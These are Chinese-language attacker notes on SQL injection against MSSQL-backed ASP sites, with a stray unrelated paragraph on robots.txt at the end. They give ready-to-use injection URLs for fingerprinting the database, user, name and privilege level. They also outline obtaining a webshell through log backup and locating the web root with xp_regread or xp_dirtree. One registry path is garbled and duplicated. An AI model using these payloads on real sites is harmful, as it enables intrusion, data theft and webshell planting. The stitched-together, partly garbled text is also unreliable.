- 首先檢測下MSSQL數據庫的用戶權限,一般有兩種,一種是SA權限,這種權限很大,還有一種是DB_OWNER權限,這個權限賦給用戶一些對數據庫的修改、刪除、新增數據庫表,執行部分存儲過程的權限。但是涉及到一些系統敏感操作權限不具備。
- 判斷數據庫類型:http:www.xx.com/detail.asp?id=1' and (select count(*) from msysobjects) > 0 --;
- 接着刺探數據庫用戶名:http://www.xx.com/detail.asp?id=1' and user>0 --;
- 然后是數據庫角色:http://www.xx.com/detail.asp?id=1' and 1=(select IS_SRVROLEMEMBER('sysadmin')); --,返回錯誤,說明不是SA;如果http://www.xx.com/detail.asp?id=1’ and 1=(select IS_MEMBER('db_owner')); --,返回正常,說明是db_owner權限。
- 數據庫名:http://www.xx.com/detail.asp?id=1' and db_name()>0 --;
- db_owner是我們常用的方法是讀網站目錄,然后備份獲取shell,很多朋友依然用database差異備份的方法,這個方法有個缺點,那就是獲得的shell太大。下面演示log備份獲得webshell,它取得的webshell一般只有20-70kB左右,NBSI3中已經加入了這個方法:http://book.2cto.com/201506/52027.html
- 下面找網站的目錄,有兩種方法:一種是xp_regread讀注冊表中HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots項;第二種是xp_dirtree列目錄,可以通過工具;
- http://blog.163.com/lang_zhu/blog/static/8329405220084233174509/ 詳情見此網站;_hLOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual RootsHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots
- http://blog.163.com/jswinter@yeah/blog/static/67502270201043181624609/
robots.txt是網站管理創建的一個txt文件,告訴搜索引起哪些文件需要被爬取、哪些文件不希望被爬取。搜索引擎的spider的大致過程為首先請求一個頁面,然后分析這個頁面,查找該頁面鏈接到其他內容的鏈接,然后請求,如此循環。